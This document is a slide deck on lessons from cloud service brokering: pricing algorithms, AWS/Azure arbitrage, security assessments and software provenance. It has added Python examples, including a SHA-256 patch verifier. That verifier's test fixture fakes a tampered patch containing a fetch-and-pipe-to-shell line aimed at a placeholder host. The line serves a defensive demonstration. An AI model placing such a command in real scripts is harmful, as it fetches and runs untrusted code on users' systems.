5 ¾ THINGS WE LEARNED BROKERING CLOUDS: Why you should trust your Broker more than your Banker
Jon-Michael C. Brook, CISSP
AGENDA
• Introductions
• 5 Things Learned
• The Common Sense ¾
• Wrap-up
• Questions
POLL 1: HEARD OF BROKERS?
• What level of exposure do you have to Cloud Brokers?
• Text and your message to 22333
INTRODUCTIONS
5 years in Enterprise automation; 2 years in brokering
– Booz Allen (23K employees – 1.5K broker users)
– Government (280K employees – 2K+ users)
– Commercial
• Health Care
• Oil & Gas
• Pharmaceuticals
POLL 2: OPEN SOURCE
• Do you use open source software? (Text a CODE to 22333)
– Yes, love it and would even contribute (if only I knew how to code)! – 202259
– Depends on the situation, maybe Linux for a server... – 202262
– Unfortunately, legal and compliance won't allow it. – 202267
– No way man, I want someone's throat to choke! – 202268
#5 - OPEN IS MORE CLOSED THAN YOU THINK
• Modularity, Openness & Reusability
• Impressive open source technologies from Red Hat and others for enterprise automation
– CloudFormation/CloudForms
– AWS Integration
– Containerization/PaaS offerings
– Lacking the self-service and ease of use
✓ Limited sample scripts only
• Dependencies on other open source projects create limitations
– Staggered rollouts require custom code
• Implementer on the hook for updates
– New features released that overwrite custom code
INTRODUCING THE OPEN CLOUD BROKER
[Architecture diagram: User Portal or Marketplace; Administrator Portal; Cloud Orchestration Engine; IaaS Broker, PaaS Broker, SaaS Broker, Data Broker, TaaS Broker and XaaS Broker.]
Capabilities
• Multi-IaaS integration
• Sticky PaaS config
• SaaS offerings
Benefits
• Modular/Flexible
• Open Source
• Business Process Integration
• Marketplace
http://www.boozallen.com/consulting/management-consulting/operational-efficiency/cloud-service-brokering
#4 MANAGE CUSTOMER EXPECTATIONS
Control Scope Creep
– Brokerage solutions are relatively new; expect a lot of PoCs, customer demos and pilots.
– Create a well-defined Statement of Work/Contract
– Deliver a repeatable, tested, well-documented, packaged solution
Results
– Avoid cost overruns
– Prevent delivery delays
– Provide self-service capabilities
#3 – STICKINESS KILLS!
Tempting, built-in services (PaaS)
– Price advantages (free?)
– Performance/Resiliency advantages
• Master/Slave databases
• Web sites
• Underlying core services (DNS, DHCP, NTP)
– Are there corresponding services with other CSPs?
DevOps/Orchestration
– Allows reuse of systems & services across multiple vendors
• Puppet, Chef, Juju, etc.
– A major broker advantage anyway!
#2 - BROKER’S ALGORITHMS DEAL ALL THE CARDS
• Sizing Models
• Price Arbitrage
• Cost Algorithms
• Efficient Architecture & Design
• Rebates & Discounts
PRICING
Commoditization already in play
– Differentiable/niche markets not as aggressive
• Secure, bring your own hardware, VMware/Microsoft/open-source based
Price wars already started for IaaS
– Google, Azure and AWS price cuts
• AWS already regularly discounts services as new offerings are brought online
• Google aggressively pricing GCE
• Microsoft working to match
BROKER ALGORITHM CONSIDERATIONS
FOR CSP (AZURE, AWS, RACKSPACE, VCHS, ONPREM, CUSTOM) [
    TIERS (WEB, DB, APP, DMZ, OOB, ETC);
    NATIVESTICKY (YES, NO);
    SECURITYLEVEL (PII, H, M, L);
    LICENSE COSTS (OS, DB, HA, SEC, BYOL);
    SPACEAVAIL (YES, NO);
    RESILIENCY (#9’S);
    ELASTIC (NONE, SLOW, AVG, AGGRESSIVE, CUSTOM);
    SERVERS = RESILIENCY * ELASTIC (TIERS - NATIVESTICKY + COUNT (SECURITYLEVEL));
    COST = SPACEAVAIL * NATIVESTICKY * ELASTIC * RESILIENCY (LICENSE + TIERS * SECURITY * PRICE);
    OPTIONS = BUDGET < COST;
]
BROKERDISPLAY (OPTIONS);
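Added example, not code from the deck or from Booz Allen's broker: one concrete reading of the slide's pseudocode as a runnable option generator. Every price, license add-on, weight and the budget is constructed for illustration, and three choices are assumptions not stated on the slide: each nine of availability beyond three adds a replica set, an H/PII workload adds one server for its control plane, and options are those with COST <= BUDGET (the slide writes BUDGET < COST, which reads as the infeasible set).

```python
import math
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Hypothetical weights (assumption): PII is the most expensive level to host.
SECURITY_WEIGHT = {"L": 1.0, "M": 1.2, "H": 1.5, "PII": 2.0}            # SECURITYLEVEL
ELASTIC_FACTOR = {"NONE": 1.0, "SLOW": 1.25, "AVG": 1.5, "AGGRESSIVE": 2.0}  # ELASTIC


@dataclass
class Csp:
    name: str
    price_per_server_day: float       # PRICE (constructed, not a real quote)
    license_costs: Dict[str, float]   # LICENSE COSTS: OS, DB, HA, SEC, BYOL add-ons per server-day
    native_sticky: bool               # NATIVESTICKY: design leans on a proprietary PaaS service
    space_avail: bool                 # SPACEAVAIL: capacity actually available to this customer
    resiliency_nines: int             # RESILIENCY: target availability as a count of 9s


@dataclass
class Request:
    tiers: List[str]                  # TIERS: WEB, DB, APP, DMZ, OOB, ...
    security_level: str               # SECURITYLEVEL: PII, H, M, L
    elastic: str                      # ELASTIC profile
    budget_per_day: float             # BUDGET
    licenses: List[str] = field(default_factory=list)


def replica_sets(nines: int) -> int:
    """Assumption: three nines runs on one replica set; each further nine adds one."""
    return max(1, nines - 2)


def server_count(csp: Csp, req: Request) -> int:
    """SERVERS = RESILIENCY * ELASTIC(TIERS - NATIVESTICKY + COUNT(SECURITYLEVEL)).
    A sticky native PaaS removes one tier's worth of servers (the CSP runs it);
    H/PII adds one server for the extra control plane (bastion, logging)."""
    base = len(req.tiers) - (1 if csp.native_sticky else 0)
    base += 1 if req.security_level in ("H", "PII") else 0
    return math.ceil(base * ELASTIC_FACTOR[req.elastic]) * replica_sets(csp.resiliency_nines)


def daily_cost(csp: Csp, req: Request) -> float:
    """COST = servers * (PRICE + LICENSE) * SECURITY weight, in dollars per day."""
    per_server = csp.price_per_server_day + sum(csp.license_costs.get(k, 0.0) for k in req.licenses)
    return round(server_count(csp, req) * per_server * SECURITY_WEIGHT[req.security_level], 2)


def broker_options(csps: List[Csp], req: Request) -> List[Tuple[str, int, float, bool]]:
    """BROKERDISPLAY(OPTIONS): CSPs with capacity whose cost fits the budget, cheapest first."""
    options = []
    for csp in csps:
        if not csp.space_avail:       # SPACEAVAIL = NO: nothing to offer
            continue
        cost = daily_cost(csp, req)
        if cost <= req.budget_per_day:  # feasible set (slide writes BUDGET < COST)
            options.append((csp.name, server_count(csp, req), cost, csp.native_sticky))
    return sorted(options, key=lambda o: o[2])


# Constructed catalogue and request: illustrative numbers only.
CSPS = [
    Csp("AWS", 4.00, {"OS": 0.50, "DB": 2.00, "HA": 1.00, "SEC": 0.50, "BYOL": 0.0}, True, True, 4),
    Csp("Azure", 4.50, {"OS": 0.00, "DB": 1.50, "HA": 1.00, "SEC": 0.50, "BYOL": 0.0}, True, True, 4),
    Csp("Rackspace", 3.50, {"OS": 0.50, "DB": 2.50, "HA": 1.50, "SEC": 0.50, "BYOL": 0.0}, False, True, 3),
    Csp("OnPrem", 2.00, {"OS": 0.00, "DB": 2.00, "HA": 0.00, "SEC": 0.00, "BYOL": 0.0}, False, False, 3),
]
REQUEST = Request(["WEB", "APP", "DB", "DMZ"], "PII", "AVG", budget_per_day=150.0, licenses=["OS", "DB"])

if __name__ == "__main__":
    for name, servers, cost, sticky in broker_options(CSPS, REQUEST):
        print(f"{name:10s} {servers:3d} servers  ${cost:8.2f}/day  sticky={sticky}")
```

With these numbers the sticky providers need fewer servers per tier but the PII weight and license add-ons dominate, so the non-sticky option comes out cheapest and AWS drops out of the displayed set on budget alone. The point to keep from the slide is that every one of these weights is a lever the broker controls, so a customer should ask to see them.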
ARBITRAGE: AN ILLUSTRATIVE EXAMPLE: CAPACITY PLANNING
ARBITRAGE: AN ILLUSTRATIVE EXAMPLE: AZURE SIZING AND PRICING
ARBITRAGE: AN ILLUSTRATIVE EXAMPLE: AMAZON WEB SERVICES SIZING AND PRICING
SIDE BY SIDE COMPARISONS: CPU CAPACITY
[Chart residue removed. Two bar charts, one per CSP, by tier (Web, DB, App, Auth) and load profile (Peak (<2 hr), Incremental (8 hr), Persistent (24 hr)): CPU capacity of the AWS instance mixes per tier (t2S, t2M, m3M, m3L, m3XL) in AWS m3.2XL units, axis 0–40; CPU capacity of the Azure instance mixes per tier (S, M, L, XL) in Azure XL units, axis 0–80.]
SIDE BY SIDE COMPARISONS: MEMORY CAPACITY
[Chart residue removed. Same tiers, profiles and instance mixes: memory capacity in AWS m3.2XL units (axis 0–40) and in Azure XL units (axis 0–80).]
SIDE BY SIDE COMPARISONS: PRICE PER DAY
[Chart residue removed. Same tiers, profiles and instance mixes: AWS price per day (axis $0–$25) and Azure cost per day (axis $0–$60).]
ARBITRAGE ISSUES
Notice any problems with this example? It rests on the relative CSP processing capabilities:
• Is an Azure XL equal to an AWS m3.2XL?
– There are larger and more specialized units within all of the environments – IOPS, SSD, memory, etc.
• Does the computing/memory capability of an Azure instance offset the price differential?
• AWS offers an ECU – EC2 Compute Unit – as its relative CPU measure
• Azure bases its pricing on a similar set of statistics
– e.g. the Database Transaction Unit (DTU) for Azure SQL
Scrutinizing the broker's algorithms at this level of detail is difficult
– They might include company-sensitive information
• At least ask the question
References: Forbes article; Gigaom report (next slides)
GIGAOM: COMPARING CSP PERFORMANCE
http://research.gigaom.com/report/comparing-major-cloud-service-providers-virtual-processor-performance/
Again – results open to interpretation
VIRTUAL PROCESSOR SCORING & DERIVATION: AWS, AZURE, RACKSPACE
FORBES: COMPARE AWS/VCHS/AZURE
http://www.forbes.com/sites/benkepes/2014/08/15/vmware-stick-the-boot-into-amazon-pricing-but-are-they-telling-the-whole-story/
NO SMOOTH COMPARISON; TESTING ON AN APP-BY-APP BASIS
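Added example, not from the deck: why "is an Azure XL equal to an AWS m3.2XL?" decides the arbitrage. The demand table (in the deck's m3.2XL units, for the Web/DB/App/Auth tiers and the Peak/Incremental/Persistent profiles) and the per-hour prices in cents are constructed, not real quotes. The only input that is not constructed is the one the deck says no published metric supplies: the conversion factor from one Azure XL to m3.2XL-equivalents, which has to come from your own app-by-app benchmark. Instances are counted whole, so the factor changes the bill in steps, not smoothly.

```python
import math
from fractions import Fraction
from typing import Dict, Tuple

# Hours per day each load profile runs: the deck's Peak (<2), Incremental (8hr), Persistent (24hr).
PROFILE_HOURS = {"Peak": 2, "Incremental": 8, "Persistent": 24}

# Constructed demand per tier and profile, in AWS m3.2XL-equivalents.
DEMAND: Dict[str, Dict[str, float]] = {
    "Web":  {"Peak": 4.0, "Incremental": 2.0, "Persistent": 1.0},
    "DB":   {"Peak": 2.0, "Incremental": 2.0, "Persistent": 2.0},
    "App":  {"Peak": 3.0, "Incremental": 1.5, "Persistent": 0.5},
    "Auth": {"Peak": 1.0, "Incremental": 0.5, "Persistent": 0.5},
}

# Constructed on-demand prices in cents per instance-hour (assumption, not real list prices).
AWS_M3_2XL_CENTS = 56
AZURE_XL_CENTS = 48


def servers_needed(demand_units: Fraction, units_per_instance: Fraction) -> int:
    """Instances are whole, so round up. Fractions avoid ceil() surprises with binary floats."""
    return math.ceil(demand_units / units_per_instance)


def daily_cost_cents(units_per_instance: Fraction, price_cents_per_hour: int) -> int:
    """Sum over tiers and profiles of instances * hours * price, in cents per day (exact integer)."""
    total = 0
    for profiles in DEMAND.values():
        for profile, demand in profiles.items():
            n = servers_needed(Fraction(demand), units_per_instance)
            total += n * PROFILE_HOURS[profile] * price_cents_per_hour
    return total


def compare(azure_xl_in_m3_2xl_units: str) -> Tuple[int, int, str]:
    """Daily AWS cost, daily Azure cost and the cheaper CSP for one conversion factor.
    The factor is how many m3.2XL-equivalents one Azure XL delivers for this workload."""
    aws = daily_cost_cents(Fraction(1), AWS_M3_2XL_CENTS)
    azure = daily_cost_cents(Fraction(azure_xl_in_m3_2xl_units), AZURE_XL_CENTS)
    return aws, azure, ("Azure" if azure < aws else "AWS")


if __name__ == "__main__":
    for factor in ("1", "0.8", "0.6"):
        aws, azure, winner = compare(factor)
        print(f"1 Azure XL = {factor} m3.2XL: AWS ${aws / 100:.2f}/day, "
              f"Azure ${azure / 100:.2f}/day -> {winner}")
```

If the broker assumes the two units are equal, Azure wins by the price gap alone; if a benchmark shows one XL delivering 80% of an m3.2XL, the rounding-up of whole instances already flips the result to AWS. That is the question to put to a broker whose comparison chart does not state its conversion factor.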
#1 - SECURITY’S AN OPPORTUNITY
Know the CSPs and use their mitigations
• (Also know they may be sticky!)
• CloudHSM – root of trust w/ SafeNet Luna
• FedRAMP of Azure
Qualitative Assessments
• Gartner Magic Quadrant
• Broker Analysis of Alternatives
• FedRAMP
Quantitative Assessments
• CSA STAR
• SOC 1 / SOC 2 Audits
Provenance & Pedigree
• aka Pre & Post Configuration
QUALITATIVE ASSESSMENTS
IAAS GARTNER MAGIC QUADRANT
*Gartner, Magic Quadrant for Cloud Infrastructure as a Service, Lydia Leong et al., published: 28 May 2014
RISK MITIGATION - CHOOSING CSPS
*Results based on Booz Allen Cloud Service Provider AoA – 2014.05.30
PROVIDE A QUICK STARTING POINT
Brokers need to start the discussion
• Identify most important customer risks
• Combine with industry knowledge and experience
BCP/DR
• All Microsoft shop—does it make sense to retrain to another provider?
Provisioning
• Processes and procedures in place—retool from enterprise VMware?
Automation
• Linux scripts transfer over directly—DevOps makes it easy to port anywhere?
Governance, Risk & Compliance
• Which providers offer SOC/IaaS underlying certifications to pass PCI/HIPAA/FISMA audits?
POLL: SOFTWARE SOURCES
• How do you handle software installations within your enterprise environment? (Text a CODE to 22333)
– We have gold disks that provide our baseline image – 189504
– We download the executable from the vendor – 189511
– We check the hash on all files before rollout – 199643
– We download the source and compile it ourselves whenever possible – 199648
– We test every patch within a lab environment – 199649
– We automate rollout – 199650
– We automate rollback – 199653
PROVENANCE & PEDIGREE
Beyond Configuration Management
– On-premise Enterprise: Utilize an ISO, test downloaded patches from the “vendor”
• How many people here actually check the hashes?
• Vendor infected distribution
– Sony/BMG rootkit, Dell firmware, Stuxnet anyone?
– Even bigger issue in the cloud? Snapshots, most software from linked locations, ISOs difficult to load/use
Provenance
– Provide contextual evidence for its original production or discovery, by establishing the sequences of its formal ownership, custody, and places of storage
Pedigree
– A document to record ancestry
Known “good” software/updates/distributions
– Trusted Broker service
• Define your repositories for Linux updates
– e.g. spacewalk.redhat.com; www.pulpproject.org
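Added example, not from the deck and not a Booz Allen or Red Hat tool: the "actually check the hashes" step as a gate a rollout pipeline can run. It parses a sha256sum-style SHA256SUMS manifest, streams each listed artifact through SHA-256, and reports OK, MISMATCH, MISSING or UNLISTED so that anything but OK blocks the rollout. The patch file names, their contents and the manifest are constructed fixtures written to a temporary directory.

```python
import hashlib
import os
import tempfile
from typing import Dict


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse sha256sum output ('<hex>  <name>' or '<hex> *<name>'); skip blanks and comments."""
    expected: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition(" ")
        name = name.strip().lstrip("*")         # '*' marks binary mode in sha256sum output
        if len(digest) != 64 or not sep or not name:
            raise ValueError(f"malformed manifest line: {raw!r}")
        expected[name] = digest.lower()
    return expected


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file so a multi-GB ISO does not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def verify_dir(directory: str, manifest_text: str) -> Dict[str, str]:
    """Status per artifact: OK, MISMATCH (content differs), MISSING (listed but absent),
    UNLISTED (present but not in the manifest). Anything but OK should block rollout."""
    expected = parse_manifest(manifest_text)
    results: Dict[str, str] = {}
    for name, digest in expected.items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "MISSING"
        elif sha256_file(path) == digest:
            results[name] = "OK"
        else:
            results[name] = "MISMATCH"
    for name in os.listdir(directory):
        if name not in expected:
            results[name] = "UNLISTED"
    return results


def demo() -> Dict[str, str]:
    """Constructed fixture: a good patch, a tampered patch, a missing one, and an unlisted binary."""
    good = b"#!/bin/sh\necho applying patch 1.0\n"
    original_1_1 = b"#!/bin/sh\necho applying patch 1.1\n"
    tampered_1_1 = original_1_1 + b"curl -s http://example.invalid/x | sh\n"   # constructed backdoor
    manifest = "\n".join([
        "# SHA256SUMS (constructed)",
        f"{hashlib.sha256(good).hexdigest()}  patch-1.0.sh",
        f"{hashlib.sha256(original_1_1).hexdigest()} *patch-1.1.sh",
        f"{hashlib.sha256(b'never downloaded').hexdigest()}  patch-1.2.sh",
    ])
    with tempfile.TemporaryDirectory() as d:
        for name, data in (("patch-1.0.sh", good),
                           ("patch-1.1.sh", tampered_1_1),
                           ("vendor-tool.bin", b"\x7fELF")):
            with open(os.path.join(d, name), "wb") as f:
                f.write(data)
        return verify_dir(d, manifest)


if __name__ == "__main__":
    for name, status in sorted(demo().items()):
        print(f"{status:9s} {name}")
```

A manifest fetched from the same mirror as the artifact only proves the download was not corrupted in transit; an attacker who can replace the package can replace SHA256SUMS too. For provenance the manifest itself has to be signed and the signature checked against a key obtained out of band, and the repository pinned (the Spacewalk/Pulp point above), so the hash check is the last gate rather than the only one.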
# ¾ - TRUST
Not looking for a Boy Scout
– Do need transparency:
• Cost savings? Pass a portion on to the customer
• Sticky services? Advise on the implications ahead of time
• Unmitigated security risks? Come to terms and offer alternatives, even if from another vendor
– Most of us are in business
– It is your reputation
Value the relationship for the long run
– A quick sale/qualifier might damage your reputation if not executed successfully